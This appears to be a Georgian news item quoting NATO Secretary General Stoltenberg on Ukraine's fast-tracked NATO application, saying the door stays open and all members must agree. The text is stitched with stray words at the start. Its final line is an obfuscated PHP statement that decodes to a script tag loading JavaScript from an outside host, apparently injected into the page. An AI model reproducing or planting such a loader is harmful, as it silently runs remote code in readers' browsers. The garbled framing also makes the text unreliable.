celsiusi
ავერსი შნაიდერი
ნატოს გენერალური მდივანი პასუხობს შეკითხვას, უკრაინის მხრიდან, ნატოს წევრობის განაცხადის დაჩქარებული წესით შეტანასთან დაკავშირებით და ამბობს, რომ ყველა დემოკრატიული ქვეყნის უფლებაა მიიღოს გადაწყვეტილება, რომელ ორგანიზაციაში სურს გაწევრიანება. 
 
"ყველა დემოკრატიულ ქვეყანას შეუძლია შეიტანოს ნატოში განაცხადი და გახდეს ნატოს წევრი ქვეყანა, ამას მუდმივად ვიმეორებთ, რომ ჩვენი კარი ღია რჩება და ამის დემონსტრირებას ვახდენთ ბოლო წლებია. მადრიდში, სამიტზე შევხვდით და ძალიან ნათლად განვაცხადეთ, რომ მხარს ვუჭერთ უკრაინის უფლებას აირჩიოს საკუთარი გზა და თვითონ მიიღოს გადაწყვეტილება, თუ რომელი უსაფრთხოების ორგანიზაციის ნაწილი უნდა, რომ იყოს და რა თქმა უნდა შემდეგ ყველა წევრი ქვეყანა უნდა დაეთანხმოს ამას, კონსენსუსს უნდა მივაღწიოთ. ჩვენი ფოკუსი ახლა არის დაუყოვნებლივ მხარდაჭერაზე, უკრაინის დახმარებაზე რუსეთის დაპყრობითი ომის შესაჩერებლად. ძირითადი აქცენტი ამაზე გვაქვს გადატანილი ამ დროისთვის" – განაცხადა სტოლტენბერგმა. 
518
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");